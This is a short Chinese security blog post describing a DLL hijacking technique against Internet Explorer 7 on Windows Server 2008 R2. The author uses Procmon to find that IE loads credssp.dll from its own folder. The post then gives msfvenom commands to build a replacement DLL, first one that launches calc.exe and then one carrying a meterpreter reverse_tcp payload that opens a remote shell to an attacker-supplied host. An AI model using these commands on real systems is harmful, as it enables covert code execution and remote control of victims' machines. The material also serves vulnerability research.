IEdll hijacking
前言
今天下午原本是想复现这篇文章里面的UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking – egre55 – thoughts on security DLL劫持。没想到我在WIndows Server 2008 R2测试的时候发现IE的DLL劫持
正文
环境:windows Server 2008 R2
IE版本:IE 7
IE文件夹里面原来的样子:
先配置好Procmon
重启Procmon然后打开IE,找到credssp.dll
当时我是抱着一试的心态,用msfvenom生成了个dll
msfvenom -p windows/exec CMD="calc.exe" -f dll > credssp.dll
然后放入到IE的文件夹里,然后重启IE
测试结果:
再次用Procmon分析
发现注册表会找这个DLL,如果找到了就执行
credssp.dll成功被IE执行
msfvenom生成反弹meterpreter的dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > credssp.dll
替换掉那个弹CALC的dll
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:IEdll hijacking
本文作者:九世
发布时间:2019-03-04, 16:58:57
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/c1ab089d.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。